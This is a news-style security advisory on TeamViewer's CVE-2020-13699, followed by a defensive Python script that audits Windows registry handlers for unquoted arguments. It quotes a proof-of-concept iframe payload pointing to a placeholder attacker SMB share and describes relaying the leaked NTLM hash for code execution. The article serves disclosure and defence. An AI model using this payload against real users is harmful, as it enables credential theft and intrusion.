TeamViewer recently patched a high-risk vulnerability in its desktop app for Windows by releasing a new version of its software. If exploited, the flaw could let remote attackers steal your system password and potentially exploit it.
What’s more worrying is that this attack does not require the victim’s interaction and can be performed almost automatically.
For those unaware, TeamViewer is a popular software application developed by the German company TeamViewer GmbH, for remote control, desktop sharing, online meetings, web conferencing and file transfer between computers.
It is available for Microsoft Windows, Linux, macOS, Chrome OS, Android, iOS, Windows RT, Windows Phone 8, and BlackBerry operating systems. It is also possible to access a system running TeamViewer with a web browser.
The severe vulnerability, tracked as CVE-2020-13699, was first discovered by Jeffrey Hofmann, a security researcher from Praetorian. According to the researcher, the vulnerability resides in the way TeamViewer for Windows quotes its custom URI handlers (an unquoted URI handler).
The expert discovered that the issue could allow an attacker to force the software to relay an NTLM authentication request to the attacker’s system. In other words, an attacker can invoke TeamViewer’s URI scheme from a web page to trick the application installed on the victim’s system into initiating a connection to an attacker-owned remote SMB share.
This triggers the SMB authentication process, which in turn leaks the system’s username and the NTLMv2-hashed version of the password to the attacker.
To successfully exploit CVE-2020-13699, the attacker needs to embed a malicious iframe on a website and then trick victims into visiting that maliciously crafted URL. Once the victims click the link, TeamViewer will automatically launch its Windows desktop client and open a remote SMB share.
“An attacker could embed a malicious iframe in a website with a crafted URL (iframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs') that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share,” explained Jeffrey Hofmann in an advisory.
“Windows will perform NTLM authentication when opening the SMB share and that request can be relayed (using a tool like responder) for code execution (or captured for hash cracking).”
This vulnerability affects “URI handlers teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1, and tvvpn1,” Hofmann said.
Following disclosure of the vulnerability, the TeamViewer project patched the flaw by quoting the parameters passed by the affected URI handlers, e.g., URL:teamviewer10 Protocol "C:\Program Files (x86)\TeamViewer\TeamViewer.exe" "%1".
“We implemented some improvements in URI handling relating to CVE 2020-13699,” said TeamViewer in a statement. “Thank you, Jeffrey Hofmann with Praetorian, for your professionalism, and following a responsible disclosure model. We are grateful that you reached out to us and that you could confirm the fix of your findings in the latest release.”
To address the issue, TeamViewer has released version 15.8.3 and recommends that users upgrade to this version immediately.
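To confirm the fix on a host, an administrator can check that each affected handler passes its argument as "%1". The script below is an added example, not code from TeamViewer or Praetorian; it assumes the handlers are registered in the standard Windows location (HKEY_CLASSES_ROOT\<scheme>\shell\open\command), and its function names and the unquoted sample entry are constructed for illustration.

```python
import sys

# URI schemes the advisory lists as affected (names taken from the article).
AFFECTED_SCHEMES = [
    "teamviewer10", "teamviewer8", "teamviewerapi", "tvchat1", "tvcontrol1",
    "tvfiletransfer1", "tvjoinv8", "tvpresent1", "tvsendfile1",
    "tvsqcustomer1", "tvsqsupport1", "tvvideocall1", "tvvpn1",
]

# Constructed sample data, used when not running on Windows.
SAMPLE = {
    # Quoted form, as shown in the article for the patched handler.
    "teamviewer10": r'"C:\Program Files (x86)\TeamViewer\TeamViewer.exe" "%1"',
    # Unquoted form, constructed here to illustrate what the check flags.
    "tvvpn1": r'"C:\Program Files (x86)\TeamViewer\TeamViewer.exe" %1',
}

def unquoted_placeholders(command):
    """Count %1 outside double quotes (escaped quotes are not handled)."""
    in_quotes, hits, i = False, 0, 0
    while i < len(command):
        if command[i] == '"':
            in_quotes = not in_quotes
        elif not in_quotes and command.startswith("%1", i):
            hits += 1
            i += 1  # skip the '1'
        i += 1
    return hits

def audit(commands):
    """Return the handlers whose command passes %1 unquoted."""
    return {s: c for s, c in commands.items() if unquoted_placeholders(c)}

def read_handler_commands(schemes):
    # Windows only: default value of HKEY_CLASSES_ROOT/<scheme>/shell/open/command.
    import winreg
    found = {}
    for scheme in schemes:
        try:
            path = scheme + r"\shell\open\command"
            with winreg.OpenKey(winreg.HKEY_CLASSES_ROOT, path) as key:
                found[scheme] = winreg.QueryValueEx(key, "")[0]
        except OSError:
            pass  # scheme not registered on this host
    return found

if __name__ == "__main__":
    commands = read_handler_commands(AFFECTED_SCHEMES) if sys.platform == "win32" else SAMPLE
    for scheme, cmd in audit(commands).items():
        print(f"unquoted %1 in handler {scheme}: {cmd}")
```

On Windows the script reads the live registry; elsewhere it runs against the constructed sample and reports only the tvvpn1 entry.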